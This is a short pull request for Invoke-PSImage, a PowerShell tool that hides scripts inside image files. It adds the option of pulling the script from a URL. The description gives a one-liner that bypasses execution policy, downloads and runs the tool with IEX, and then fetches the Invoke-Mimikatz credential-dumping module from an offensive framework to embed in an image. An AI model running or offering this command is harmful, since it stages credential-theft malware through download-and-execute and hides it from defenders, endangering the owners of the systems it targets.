### PR TITLE
Added ability to download script from web

### DIFF
--- a/Invoke-PSImage.ps1
+++ b/Invoke-PSImage.ps1
@@ -80,7 +80,7 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki
     # Read in the script
     if ( $WebScript ) {
         $R=Invoke-WebRequest $WebScript
-        $ScriptBlockString=$R.RawContent+";"
+        $ScriptBlockString=$R.Content+";"
     }
     else {
         $ScriptBlockString = [IO.File]::ReadAllText($Script)


### PR DESCRIPTION
Using this mod you can have the script downloaded from web since it is easier for oneliners.
The parameters are now not mandatory though :(

powershell -noprofile -executionpolicy bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dxflatline/Invoke-PSImage/master/Invoke-PSImage.ps1'); Invoke-PSImage -Image c:\temp\stc.jpg -Out C:\temp\stc-out.png -WebScript https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1